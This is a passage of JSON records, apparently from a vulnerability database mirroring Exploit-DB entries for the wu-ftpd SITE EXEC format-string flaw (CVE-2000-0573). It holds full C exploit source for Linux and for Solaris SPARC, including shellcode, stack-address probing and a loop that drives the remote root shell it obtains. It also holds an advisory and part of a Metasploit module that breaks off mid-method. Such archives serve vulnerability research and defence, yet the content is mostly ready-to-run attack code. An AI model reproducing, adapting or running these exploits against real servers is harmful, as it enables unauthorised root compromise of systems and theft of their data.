\"\\x31\\xdb\\xb0\\x01\\xcd\\x80\\xe8\\x90\\xff\\xff\\xff\\xff\\xff\\xff\"\r\n \"\\x30\\x62\\x69\\x6e\\x30\\x73\\x68\\x31\\x2e\\x2e\\x31\\x31\";\r\n\r\n\r\nmain (int argc, char *argv[])\r\n{\r\n\r\n char cmdbuf[8192];\r\n char cbuf[1024];\r\n char *t;\r\n char nop[400];\r\n int pip, i, a = 22, st = 0;\r\n struct sockaddr_in sck;\r\n struct hostent *hp;\r\n long inet;\r\n int port = 21;\r\n fd_set fds;\r\n unsigned int aa;\r\n long reta, retb, tmp, retz;\r\n int ret;\r\n int add = 0;\r\n\r\n memset (cmdbuf, 0x0, sizeof (cmdbuf));\r\n memset (cbuf, 0x0, sizeof (cbuf));\r\n memset (nop, 0x0, sizeof (nop));\r\n\r\n if (argc < 2)\r\n {\r\n fprintf (stderr, \"Usage: %s [ip] \\n\", argv[0]);\r\n exit (-1);\r\n }\r\n\r\n pip = socket (PF_INET, SOCK_STREAM, 0);\r\n\r\n if (!pip)\r\n {\r\n perror (\"socket()\");\r\n exit (-1);\r\n }\r\n\r\n inet = inet_addr (argv[1]);\r\n if (inet == -1)\r\n {\r\n if (hp = gethostbyname (argv[1]))\r\n\tmemcpy (&inet, hp->h_addr, 4);\r\n else\r\n\tinet = -1;\r\n if (inet == -1)\r\n\t{\r\n\t fprintf (stderr, \"Cant resolv %s!! \\n\", argv[1]);\r\n\t exit (-1);\r\n\t}\r\n }\r\n sck.sin_family = PF_INET;\r\n sck.sin_port = htons (port);\r\n sck.sin_addr.s_addr = inet;\r\n\r\n if (connect (pip, (struct sockaddr *) &sck, sizeof (sck)) < 0)\r\n {\r\n perror (\"Connect() \");\r\n exit (-1);\r\n }\r\n\r\n read (pip, cbuf, 1023);\r\n fprintf (stderr, \"Connected to: %s \\n\", argv[1]);\r\n fprintf (stderr, \"Banner: %s \\n\", cbuf);\r\n strcpy (cmdbuf, \"user ftp\\n\");\r\n write (pip, cmdbuf, strlen (cmdbuf));\r\n memset (nop, 0x90, sizeof (nop) - strlen (linuxcode) - 10);\r\n\r\n strcat (nop, linuxcode);\r\n\r\n memset (cmdbuf, 0x0, sizeof (cmdbuf));\r\n sprintf (cmdbuf, \"pass %s\\n\", nop);\r\n write (pip, cmdbuf, strlen (cmdbuf));\r\n sleep (1);\r\n read (pip, cmdbuf, sizeof (cmdbuf) - 1);\r\n memset (cmdbuf, 0x0, sizeof (cmdbuf));\r\n if (!strncmp (cmdbuf, \"530\", 3))\r\n {\r\n printf (\"loggin incorrect : %s \\n\", cmdbuf);\r\n exit (-1);\r\n }\r\n fprintf (stderr, \"Logged in.. \\n\");\r\n fprintf (stderr, \"+ Finding ret addresses \\n\");\r\n memset (cmdbuf, 0x0, sizeof (cmdbuf));\r\n strcpy (cmdbuf, \"SITE EXEC %x %x %x %x +%x |%x\\n\");\r\n write (pip, cmdbuf, strlen (cmdbuf));\r\n sleep (1);\r\n memset (cmdbuf, 0x0, sizeof (cmdbuf));\r\n read (pip, cmdbuf, sizeof (cmdbuf) - 1);\r\n if (!strncmp (cmdbuf + 4, \"%x\", 2))\r\n {\r\n fprintf (stderr, \"\u001b[1m\u001b[31mWuftpd is not vulnerable : %s \\n\u001b[0m\",\r\n\t cmdbuf);\r\n exit (-1);\r\n }\r\n else\r\n {\r\n fprintf (stderr, \"\u001b[1m\u001b[32mWuftpd is vulnerable : %s \\n\u001b[0m\", cmdbuf);\r\n }\r\n reta = strtoul (strstr (cmdbuf, \"|\") + 1, strstr (cmdbuf, \"|\") + 11, 16);\r\n retz = strtoul (strstr (cmdbuf, \"+\") + 1, strstr (cmdbuf, \"|\") + 11, 16);\r\n\r\n memset (cmdbuf, 0x0, sizeof (cmdbuf));\r\n strcpy (cmdbuf, \"SITE EXEC \");\r\n for (ret = 0; ret <= 88; ret++)\r\n {\r\n strcat (cmdbuf, \"%x\");\r\n }\r\n strcat (cmdbuf, \"|%x\\n\");\r\n write (pip, cmdbuf, strlen (cmdbuf));\r\n sleep (1);\r\n memset (cmdbuf, 0x0, sizeof (cmdbuf));\r\n read (pip, cmdbuf, sizeof (cmdbuf) - 1);\r\n retb = strtoul (strstr (cmdbuf, \"|\") + 1, strstr (cmdbuf, \"|\") + 11, 16);\r\n printf (\"Ret location befor: %x \\n\", reta);\r\n if (reta == 0)\r\n reta = retz;\r\n else\r\n add = 600;\r\n reta = reta - 0x58;\r\n retb = retb + 100 - 0x2569 - add;\r\n printf (\"Ret location : %x \\n\", reta);\r\n printf (\"Proctitle addres : %x and %u \\n\", retb, retb);\r\n sleep (2);\r\n memset (cmdbuf, 0x0, sizeof (cmdbuf));\r\n\r\n sprintf (cmdbuf, \"SITE EXEC aaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%c\\xff%c%c\",\r\n\t (reta & 0x000000ff), (reta & 0x0000ff00) >> 8,\r\n\t (reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24);\r\n a = 22;\r\n memset (cbuf, 0x0, sizeof (cbuf));\r\n while (1)\r\n {\r\n\r\n memset (cmdbuf, 0x0, sizeof (cmdbuf));\r\n\r\n sprintf (cmdbuf, \"SITE EXEC aaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%c\\xff%c%c\",\r\n\t (reta & 0x000000ff), (reta & 0x0000ff00) >> 8,\r\n\t (reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24);\r\n for (i = 0; i <= 128; i++)\r\n\tstrcat (cmdbuf, \"%.f\");\r\n for (i = 0; i <= a; i++)\r\n\tstrcat (cmdbuf, \"%d\");\r\n sprintf (cbuf, \"|%%x|%%x\\n\", aa + 9807 - 460);\r\n strcat (cmdbuf, cbuf);\r\n write (pip, cmdbuf, strlen (cmdbuf));\r\n memset (cmdbuf, 0x0, sizeof (cmdbuf));\r\n read (pip, cmdbuf, sizeof (cmdbuf) - 1);\r\n t = (char *) strstr (cmdbuf, \"|\");\r\n tmp = strtoul (t + 1, t + 11, 16);\r\n if (tmp != 0)\r\n\t{\r\n\t fprintf (stderr, \"tmp 1 : 0x%x\\n\", tmp);\r\n\t if (tmp == reta)\r\n\t {\r\n\t fprintf (stderr, \"Cached a : %d \\n\", a);\r\n\t st = 1;\r\n\t break;\r\n\t }\r\n\t tmp = strtoul (t + 11, t + 22, 16);\r\n\t fprintf (stderr, \"tmp 2 : 0x%x\\n\", tmp);\r\n\t if (tmp == reta)\r\n\t {\r\n\t fprintf (stderr, \"Cached a : %d \\n\", a);\r\n\t st = 2;\r\n\t break;\r\n\t }\r\n\t}\r\n if (st > 0)\r\n\tbreak;\r\n a++;\r\n }\r\n sleep (1);\r\n memset (cmdbuf, 0x0, sizeof (cmdbuf));\r\n memset (cbuf, 0x0, sizeof (cbuf));\r\n\r\n sprintf (cmdbuf, \"SITE EXEC aaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb%c%c\\xff%c%c\",\r\n\t (reta & 0x000000ff), (reta & 0x0000ff00) >> 8,\r\n\t (reta & 0x00ff0000) >> 16, (reta & 0xff000000) >> 24);\r\n for (i = 0; i <= 128; i++)\r\n strcat (cmdbuf, \"%.f\");\r\n if (add != 600)\r\n a = a - 1;\r\n fprintf (stderr, \"Trying with : %d \\n\", a);\r\n for (i = 0; i <= a; i++)\r\n strcat (cmdbuf, \"%d\");\r\n\r\n aa = retb;\r\n if (add == 600)\r\n sprintf (cbuf, \"|%%.%ud%%n\\n\", aa + 9807);\r\n else\r\n sprintf (cbuf, \"|%%.%ud%%n\\n\", aa + 9807 - 480);\r\n\r\n strcat (cmdbuf, cbuf);\r\n write (pip, cmdbuf, strlen (cmdbuf));\r\n memset (cmdbuf, 0x0, sizeof (cmdbuf));\r\n read (pip, cmdbuf, sizeof (cmdbuf) - 1);\r\n memset (cmdbuf, 0x0, sizeof (cmdbuf));\r\n\r\n fprintf (stderr, \"\u001b[1m\u001b[33m Wait for a shell.....\\n\u001b[0m\");\r\n\r\n\r\n while (1)\r\n {\r\n FD_ZERO (&fds);\r\n FD_SET (0, &fds);\r\n FD_SET (pip, &fds);\r\n select (255, &fds, NULL, NULL, NULL);\r\n if (FD_ISSET (pip, &fds))\r\n\t{\r\n\t memset (cbuf, 0x0, sizeof (cbuf));\r\n\t ret = read (pip, cbuf, sizeof (cbuf) - 1);\r\n\t if (ret <= 0)\r\n\t {\r\n\t printf (\"Connection closed - EOF \\n\");\r\n\t exit (-1);\r\n\t }\r\n\t printf (\"%s\", cbuf);\r\n\t}\r\n if (FD_ISSET (0, &fds))\r\n\t{\r\n\t memset (cbuf, 0x0, sizeof (cbuf));\r\n\t read (0, cbuf, sizeof (cbuf) - 1);\r\n\t write (pip, cbuf, strlen (cbuf));\r\n\t}\r\n }\r\n close (pip);\r\n}\r\n/* www.hack.co.za [26 September 2000]*/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20031/"}, {"lastseen": "2016-02-02T13:19:29", "description": "wu-ftpd 2.4.2/2.5 .0/2.6 .0 Remote Format String Stack Overwrite (3). CVE-2000-0573. Remote exploit for lin_x86 platform", "published": "2001-05-04T00:00:00", "type": "exploitdb", "title": "wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite 3", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0573"], "modified": "2001-05-04T00:00:00", "id": "EDB-ID:20032", "href": "https://www.exploit-db.com/exploits/20032/", "sourceData": "source: http://www.securityfocus.com/bid/1387/info\r\n \r\nWashington University ftp daemon (wu-ftpd) is a very popular unix ftp server shipped with many distributions of Linux and other UNIX operating systems. Wu-ftpd is vulnerable to a very serious remote attack in the SITE EXEC implementation. Because of user input going directly into a format string for a *printf function, it is possible to overwrite important data, such as a return address, on the stack. When this is accomplished, the function can jump into shellcode pointed to by the overwritten eip and execute arbitrary commands as root. While exploited in a manner similar to a buffer overflow, it is actually an input validation problem. Anonymous ftp is exploitable making it even more serious as attacks can come anonymously from anywhere on the internet.\r\n \r\nIt should be noted that the SITE INDEX command is affected as well. \r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20032.tar.gz", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/20032/"}, {"lastseen": "2016-01-31T11:59:53", "description": "wu-ftpd 2.6.0 Remote Format Strings Exploit. CVE-2000-0573. Remote exploit for solaris platform", "published": "2001-01-03T00:00:00", "type": "exploitdb", "title": "wu-ftpd 2.6.0 - Remote Format Strings Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0573"], "modified": "2001-01-03T00:00:00", "id": "EDB-ID:239", "href": "https://www.exploit-db.com/exploits/239/", "sourceData": "/*\r\n**\r\n** 12:40 11/10/00: Tool for either attack or defense\r\n** within an information warfare setting. Rather, it\r\n** is a small program demonstrating proof of concept.\r\n** Default values for solaris 2.8 and inetd.\r\n**\r\n** If you are not the intended recipient, or a person\r\n** responsible for delivering it to the intended\r\n** recipient, you are not authorised to and must not\r\n** disclose, copy, distribute, or retain this message\r\n** or any part of it. Such unauthorised use may be\r\n** unlawful.If you have received this transmission in\r\n** error,please email us immediately at hert@hert.org\r\n** so that we can arrange for its return.\r\n**\r\n** kalou <pb@hert.org>\r\n**\r\n** Usage:\r\n** \r\n** 0xfdc (4060) bytes after the ret position, you have:\r\n**\r\n** -HOSTNAME: anonymous/EGGSHELL\r\n**\r\n** This of course begins on a 4 bytes boundary.\r\n**\r\n** Check your hostname len. Align this with pad to have EGGSHELL on a\r\n** 4 bytes boundary (-p). Localhost needs 2 bytes, for example.\r\n**\r\n** Use '%s' format bug exploitation to look for this string in memory.\r\n** (you have to eat 15 words out of stack).\r\n**\r\n** Remove 0xfdc + len (-HOSTNAME: anonymous/pad) to your found pointer.\r\n** This substracted value is kept as the distance (-d).\r\n** Result is your return address position (-w). Check it if you want.\r\n**\r\n** This code substracts 8 to this address (sparc ret behaviour).\r\n**\r\n** You may use the 102th %p pointer on stack to find the string. eg: ffbef640.\r\n**\r\n** adding 0x870 to this value, I found my string.\r\n**\r\n** offset should be useless. site_padding depends on the '/bin/ftp-exec/' \r\n** config stuff.\r\n**\r\n** (./wu -p 2 -d 0xff4 ; cat ) | nc localhost 21\r\n**\r\n*/\r\n/* Stolener Foundation */\r\n\r\n\r\n#include <unistd.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n#ifdef __linux\r\n#include <getopt.h>\r\n#endif\r\n\r\nvoid *build_format_string(int where,\r\n\t\t\t int what,\r\n\t\t\t int gout,\r\n\t\t\t int eat,\r\n\t\t\t int pad)\r\n{\r\n int expected_len;\r\n int what1, where1;\r\n int what2, where2;\r\n char w1[512];\r\n char w2[512];\r\n\r\n int i;\r\n char *buf, *p;\r\n\r\n /* generate two %hn len : */\r\n\r\n what1 = (what >> 16) & 0xffff;\r\n what2 = what & 0xffff; \r\n\r\n fprintf(stderr, \"what1: %0x\\n\", what1);\r\n fprintf(stderr, \"what2: %0x\\n\", what2);\r\n\r\n if ( what1 > what2 ) {\r\n where1 = where + 2;\r\n where2 = where;\r\n what1 -= what2;\r\n } else {\r\n where1 = where;\r\n where2 = where + 2;\r\n what2 -= what1;\r\n }\r\n\r\n fprintf(stderr, \"removing %d.\\n\", pad + 2 * sizeof(where) + gout + \r\n\t (eat - 1) * 12);\r\n\r\n if (where1 < where2) {\r\n what1 -= pad + 2 * sizeof(where) + (eat - 1) * 12 + gout;\r\n } else {\r\n what2 -= pad + 2 * sizeof(where) + (eat - 1) * 12 + gout;\r\n }\r\n\r\n fprintf(stderr, \"%08x: writing first %s\\n\", what,\r\n\t (where1 > where2) ? \"what2\" : \"what1\");\r\n fprintf(stderr, \"what1 is %08x, what2 is %08x\\n\",\r\n\t what1, what2);\r\n\r\n sprintf(w1, \"%%0%dx%%hn\", what1);\r\n sprintf(w2, \"%%0%dx%%hn\", what2);\r\n\r\n fprintf(stderr, \"1: %s\\n2: %s\\n\", w1, w2);\r\n\r\n /* calculate expected len : */\r\n\r\n expected_len = pad + 12 + (eat - 1) * 8\r\n\t + strlen(w1) + strlen(w2) + 1;\r\n\r\n fprintf(stderr, \"len is %d\\n\", expected_len);\r\n\r\n buf = (char *) malloc(expected_len);\r\n\r\n if ( buf == NULL) \r\n return buf;\r\n\r\n p = buf;\r\n\r\n /* pad */\r\n for (i = 0; i < pad; i++) {\r\n *p++ = '.';\r\n }\r\n\r\n /* retaddr, part 1 - first %hn*/\r\n *p++ = (where1 >> 24) & 0xff;\r\n *p++ = (where1 >> 16) & 0xff;\r\n *p++ = (where1 >> 8) & 0xff;\r\n *p++ = (where1) & 0xff;\r\n\r\n *p++ = 0x0f;\r\n *p++ = 0x0e;\r\n *p++ = 0x0e;\r\n *p++ = 0x0f; /* so that the first %0(much)x eats something\r\n\r\n /* retaddr, part 2 - second %hn */\r\n *p++ = ((where2) >> 24) & 0xff;\r\n *p++ = ((where2) >> 16) & 0xff;\r\n *p++ = ((where2) >> 8) & 0xff;\r\n *p++ = (where2) & 0xff;\r\n\r\n /* eaters.. */\r\n for (i = 0; i < (eat - 1); i++) {\r\n strcpy(p, \"%000012x\");\r\n p += 8;\r\n }\r\n\r\n /* what1, what2 */\r\n if (what1 > what2) {\r\n strcpy(p, w1);\r\n strcpy(p + strlen(w1), w2);\r\n } else {\r\n strcpy(p, w2);\r\n strcpy(p + strlen(w2), w1);\r\n }\r\n\r\n\r\n return buf;\r\n}\r\n\r\nvoid *ftp_escape(void *buf)\r\n{\r\n void *boh;\r\n char *p = buf;\r\n char *r;\r\n\r\n boh = malloc(4096);\r\n r = boh;\r\n\r\n while (*p) {\r\n *r++ = *p;\r\n if ((*p) == '\\xff')\r\n *r++ = *p;\r\n p++;\r\n }\r\n *r = '\\0';\r\n return boh;\r\n}\r\n\r\nvoid usage(char *me)\r\n{\r\n fprintf(stderr, \"Usage : %s \\n\"\r\n\t \" [-w where (hexa) ] /* ret position */\\n\"\r\n\t\t \" 0 [-o offset ] /* or just offset, or both */\\n\"\r\n\t \"1010 [-d distance (hex)] /* distance to pass */\\n\"\r\n\t\t \" 2 [-s site_pad ] /* padding to site_exec */\\n\"\r\n\t\t \" 3 [-p pass_pad ] /* padding to eggshell */\\n\"\r\n\t\t \" 4 [-g gout ] /* output size (200-) */\\n\"\r\n\t\t \" 15 [-e eat ] /* pointers to eat */\\n\\n\\n\",\r\n\t\t me);\r\n exit(0);\r\n}\r\n\r\nmain(int argc, char **argv)\r\n{\r\n char c;\r\n int where, offset, distance, gout, site_pad, pass_pad, eat;\r\n char *buf;\r\n char break_sparc[] =\r\n\t\"\\x90\\x1b\\xc0\\x0f\" // xor %o7, %o7, %o0\r\n\t\"\\x82\\x10\\x20\\x17\" // mov 23, %g1\r\n\t\"\\x91\\xd0\\x20\\x08\" // ta 8 ! setuid(0)\r\n\t\"\\xae\\x10\\x20\\x2e\" // mov 0x2e, %l7\r\n\t\"\\xaf\\x2d\\xe0\\x18\" // sll %l7, 24, %l7\r\n\t\"\\xee\\x23\\xbf\\xd0\" // st %l7, [ %sp - 48 ]\r\n\t\"\\x90\\x23\\xa0\\x30\" // sub %sp, 48, %o0\r\n\t\"\\x82\\x10\\x20\\x05\" // mov 5, %g1\r\n\t\"\\x92\\x1b\\xc0\\x0f\" // xor %o7, %o7, %o1\r\n\t\"\\x91\\xd0\\x20\\x08\" // ta 8 ! fd = open(\".\", 0);\r\n\t\"\\xa6\\x82\\x20\\x01\" // addcc %o0, 1, %l3 !\r\n\t\"\\xae\\x10\\x20\\x6b\" // mov 0x6b, %l7\r\n\t\"\\xaf\\x2d\\xe0\\x18\" // sll %l7, 24, %l7\r\n\t\"\\xee\\x23\\xbf\\xd0\" // st %l7, [ %sp - 48 ]\r\n\t\"\\x90\\x23\\xa0\\x30\" // sub %sp, 48, %o0\r\n\t\"\\x92\\x10\\x21\\xff\" // mov 0x1ff, %o1\r\n\t\"\\x82\\x10\\x20\\x50\" // mov 0x50, %g1\r\n\t\"\\x91\\xd0\\x20\\x08\" // ta 8 ! mkdir(\"k\", 0755)\r\n\t\"\\x90\\x23\\xa0\\x30\" // sub %sp, 48, %o0\r\n\t\"\\x82\\x10\\x20\\x3d\" // mov 0x3d, %g1\r\n\t\"\\x91\\xd0\\x20\\x08\" // ta 8 ! chroot(\"k\")\r\n\t\"\\x90\\x24\\xe0\\x01\" // sub %l3, 1, %o0\r\n\t\"\\x82\\x10\\x20\\x78\" // mov 0x78, %g1\r\n\t\"\\x91\\xd0\\x20\\x08\" // ta 8 ! fchdir(fd)\r\n\t\"\\x2f\\x0b\\x8b\\x8b\" // sethi %hi(0x2e2e2c00), %l7\r\n\t\"\\xae\\x15\\xe3\\x2e\" // or %l7, 0x32e, %l7\r\n\t\"\\xee\\x23\\xbf\\xd0\" // st %l7, [ %sp - 48 ] ! ../.\r\n\t\"\\x2f\\x0b\\xcb\\x8b\" // sethi %hi(0x2f2e2c00), %l7\r\n\t\"\\xae\\x15\\xe2\\x2f\" // or %l7, 0x22f, %l7 \r\n\t\"\\xee\\x23\\xbf\\xd4\" // st %l7, [ %sp - 44 ] ! /../\r\n\t\"\\xee\\x23\\xbf\\xd8\" // st %l7, [ %sp - 40 ]\r\n\t\"\\xee\\x23\\xbf\\xdc\" // st %l7, [ %sp - 36 ]\r\n\t\"\\xee\\x23\\xbf\\xe0\" // st %l7, [ %sp - 32 ]\r\n\t\"\\xee\\x23\\xbf\\xe4\" // st %l7, [ %sp - 28 ]\r\n\t\"\\xee\\x23\\xbf\\xe8\" // st %l7, [ %sp - 24 ]\r\n\t\"\\xee\\x23\\xbf\\xec\" // st %l7, [ %sp - 20 ] ! .././..//..//../(ad lib)\r\n\t\"\\xc0\\x23\\xbf\\xf0\" // clr [ %sp - 16 ]\r\n\t\"\\x82\\x10\\x20\\x0c\" // mov 0xc, %g1\r\n\t\"\\x90\\x23\\xa0\\x30\" // sub %sp, 48, %o0\r\n\t\"\\x91\\xd0\\x20\\x08\" // ta 8 ! chdir(\".././../...\")\r\n\t\"\\xae\\x10\\x20\\x2e\" // mov 0x2e, %l7\r\n\t\"\\xaf\\x2d\\xe0\\x18\" // sll %l7, 24, %l7\r\n\t\"\\xee\\x23\\xbf\\xd0\" // st %l7, [ %sp - 48 ] ! stupido. anyway.\r\n\t\"\\x90\\x23\\xa0\\x30\" // sub %sp, 48, %o0\r\n\t\"\\x82\\x10\\x20\\x3d\" // mov 0x3d, %g1\r\n\t\"\\x91\\xd0\\x20\\x08\" // ta 8\r\n\t\"\\x2d\\x0b\\xd8\\x9a\" // sethi %hi(0x2f62696e), %l6 ! no more mine.\r\n\t\"\\xac\\x15\\xa1\\x6e\" // or %l6, %lo(0x2f62696e), %l6\r\n\t\"\\x2f\\x0b\\xdc\\xda\" // sethi %hi(0x2f736800), %l7\r\n\t\"\\x90\\x0b\\x80\\x0e\" // and %sp, %sp, %o0\r\n\t\"\\x92\\x03\\xa0\\x08\" // add %sp, 8, %o1\r\n\t\"\\x94\\x1b\\xc0\\x0f\" // xor %o7, %o7, %o2\r\n\t\"\\x9c\\x03\\xa0\\x10\" // add %sp, 16, %sp\r\n\t\"\\xec\\x3b\\xbf\\xf0\" // std %l6, [%sp-16]\r\n\t\"\\xd0\\x23\\xbf\\xf8\" // st %o0, [%sp-8]\r\n\t\"\\xc0\\x23\\xbf\\xfc\" // st %g0, [%sp-4]\r\n\t\"\\x82\\x10\\x20\\x3b\" // mov 59, %g1\r\n\t\"\\x91\\xd0\\x20\\x08\" // ta 8\r\n\t\"\\x91\\xd0\\x20\\x08\"; // ta 8 \r\n\r\n\r\n\r\n offset = 0;\r\n where = 0xffbeeed4;\r\n distance = 0x1004;\r\n gout = 4;\r\n eat = 15;\r\n site_pad = 2;\r\n pass_pad = 3;\r\n\r\n while ( ( c = getopt(argc, argv, \"w:o:d:e:g:s:p:\") ) != EOF ) {\r\n switch(c) {\r\n\t case 'w':\r\n\t where = strtoul(optarg, NULL, 16);\r\n\t break;\r\n\t case 'o':\r\n\t offset = atoi(optarg);\r\n\t break;\r\n\t case 'd':\r\n\t distance = strtoul(optarg, NULL, 16);\r\n\t break;\r\n\t case 'e':\r\n\t eat = atoi(optarg);\r\n\t break;\r\n\t case 'g':\r\n\t gout = atoi(optarg);\r\n\t break;\r\n\t case 's':\r\n\t site_pad = atoi(optarg) % 4;\r\n\t break;\r\n\t case 'p':\r\n\t pass_pad = atoi(optarg) % 4;\r\n\t break;\r\n\t default:\r\n\t usage(argv[0]);\r\n }\r\n }\r\n\r\n where += offset;\r\n\r\n fprintf(stderr, \"ret [%x]:%x\\n\"\r\n\t \t \"ppad %d\\n\"\r\n\t\t \"spad %d\\n\"\r\n\t\t \"gout %d\\n\"\r\n\t\t \"eat %d\\n\",\r\n\t\t where, where + distance,\r\n\t\t pass_pad, site_pad, gout, eat);\r\n\r\n printf(\"user ftp\\n\");\r\n\r\n buf = ftp_escape(break_sparc);\r\n printf(\"pass %.*s%s\\n\", pass_pad, \"xxxx\", buf);\r\n \r\n buf = build_format_string(where, where + distance - 8, gout, eat, site_pad);\r\n buf = ftp_escape(buf);\r\n\r\n printf (\"site exec %s\\n\", buf);\r\n}\r\n\n\n// milw0rm.com [2001-01-03]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/239/"}, {"lastseen": "2016-02-01T23:34:36", "description": "wu-ftpd SITE EXEC/INDEX Format String Vulnerability. CVE-2000-0573. Remote exploit for linux platform", "published": "2010-11-30T00:00:00", "type": "exploitdb", "title": "wu-ftpd - SITE EXEC/INDEX Format String Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2000-0573"], "modified": "2010-11-30T00:00:00", "id": "EDB-ID:16311", "href": "https://www.exploit-db.com/exploits/16311/", "sourceData": "##\r\n# $Id: wuftpd_site_exec_format.rb 11166 2010-11-30 00:16:53Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Ftp\r\n\tinclude Msf::Exploit::FormatString\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'wu-ftpd SITE EXEC/INDEX Format String Vulnerability',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a format string vulnerability in versions of the\r\n\t\t\t\tWashington University FTP server older than 2.6.1. By executing\r\n\t\t\t\tspecially crafted SITE EXEC or SITE INDEX commands containing format\r\n\t\t\t\tspecifiers, an attacker can corrupt memory and execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'jduck' ],\r\n\t\t\t'Version' => '$Revision: 11166 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2000-0573'],\r\n\t\t\t\t\t['OSVDB', '11805'],\r\n\t\t\t\t\t['BID', '1387']\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'PrependChrootBreak' => true\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t# format string max length\r\n\t\t\t\t\t'Space' => 256,\r\n\t\t\t\t\t# NOTE: \\xff's need to be doubled (per ftp/telnet stuff)\r\n\t\t\t\t\t'BadChars' => \"\\x00\\x09\\x0a\\x0d\\x20\\x25\\x2f\",\r\n\t\t\t\t\t'DisableNops'\t=> 'True',\r\n\t\t\t\t\t'StackAdjustment' \t=> -1500\r\n\t\t\t\t},\r\n\t\t\t'Platform' => [ 'linux' ],\r\n\t\t\t'Targets' =>\r\n\t\t\t[\r\n\t\t\t\t#\r\n\t\t\t\t# Automatic targeting via fingerprinting\r\n\t\t\t\t#\r\n\t\t\t\t[ 'Automatic Targeting', { 'auto' => true } ],\r\n\r\n\t\t\t\t#\r\n\t\t\t\t# specific targets\r\n\t\t\t\t#\r\n\t\t\t\t[\t'Slackware 2.1 (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994)',\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t'UseDPA' \t=> false,\r\n\t\t\t\t\t\t'PadBytes'\t=> 3,\r\n\t\t\t\t\t\t'NumPops' \t=> 8,\r\n\t\t\t\t\t\t'AddrPops' => 100,\r\n\t\t\t\t\t\t'Offset' => -2088, \t\t\t# offset to stack return\r\n\t\t\t\t\t\t'Writable' \t=> 0xbfffde26, \t# stack, avoid badchars\r\n\t\t\t\t\t\t'FlowHook'\t=> -1, # auto now... 0xbffff1e4\t\t# stack return addr\r\n\t\t\t\t\t}\r\n\t\t\t\t],\r\n\t\t\t\t# these aren't exploitable (using built-in, stripped down vsprintf, no %n)\r\n\t\t\t\t#[\t'RedHat 5.2 (Version wu-2.4.2-academ[BETA-18](1) Mon Aug 3 19:17:20 EDT 1998)',\r\n\t\t\t\t#[\t'RedHat 6.0 (Version wu-2.4.2-VR17(1) Mon Apr 19 09:21:53 EDT 1999)',\r\n\t\t\t\t#[\t'RedHat 6.1 (Version wu-2.5.0(1) Tue Sep 21 16:48:12 EDT 1999)',\r\n\t\t\t\t[\t'RedHat 6.2 (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000)',\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t'UseDPA' \t=> true,\r\n\t\t\t\t\t\t'PadBytes'\t=> 2,\r\n\t\t\t\t\t\t'NumPops' \t=> 276,\r\n\t\t\t\t\t\t'AddrPops' => 2,\r\n\t\t\t\t\t\t'Offset' => -17664, \t\t\t# offset to stack return\r\n\t\t\t\t\t\t'Writable' \t=> 0x806e726,\t\t# bss\r\n\t\t\t\t\t\t#'Writable' \t=> 0xbfff0126,\t\t# stack, avoid badchars\r\n\t\t\t\t\t\t'FlowHook'\t=> -1, # auto now... 0xbfffb028\t\t# stack return addr\r\n\t\t\t\t\t\t#'FlowHook' => 0x806e1e0\t\t# GOT of sprintf\r\n\t\t\t\t\t}\r\n\t\t\t\t],\r\n\r\n\t\t\t\t#\r\n\t\t\t\t# this one will detect the parameters automagicly\r\n\t\t\t\t#\r\n\t\t\t\t[\t'Debug',\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t'UseDPA' \t=> false,\r\n\t\t\t\t\t\t'PadBytes'\t=> 0,\r\n\t\t\t\t\t\t'NumPops' \t=> 0,\r\n\t\t\t\t\t\t'AddrPops' => -1,\r\n\t\t\t\t\t\t'Offset' => -1,\r\n\t\t\t\t\t\t'Writable' \t=> 0x41414242, \t#\r\n\t\t\t\t\t\t'FlowHook'\t=> 0x43434545\t\t#\r\n\t\t\t\t\t}\r\n\t\t\t\t],\r\n\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jun 22 2000'))\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(21),\r\n\t\t\t], self.class )\r\n\tend\r\n\r\n\r\n\tdef check\r\n\t\t# NOTE: We don't care if the login failed here...\r\n\t\tret = 